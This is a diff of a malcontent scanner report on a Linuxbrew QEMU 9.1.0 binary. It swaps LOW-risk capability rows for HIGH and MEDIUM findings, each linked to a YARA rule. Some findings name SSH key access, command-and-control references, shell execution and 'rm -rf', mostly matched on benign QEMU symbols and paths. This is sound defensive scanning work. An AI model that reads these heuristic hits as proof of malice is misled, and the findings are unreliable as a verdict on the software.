[ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) |
-| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) |
-| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) |
-| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) |
-| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) |
-| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) |
-| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) |
-| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
-| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) |
-| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) |
-| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) |
-| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) |
-| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
-| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) |
-| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) |
-| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) |
-| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) |
-| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) |
-| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) |
-| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) |
-| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) |
-| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
-| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
-| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) |
-| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current 
process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
+| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) |
+| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
+| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) |
+| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
+| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | 
[evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) |
+| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) |
+| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) |
+| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) |
+| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) |
+| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) |
+| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) |
+| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) |
+| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
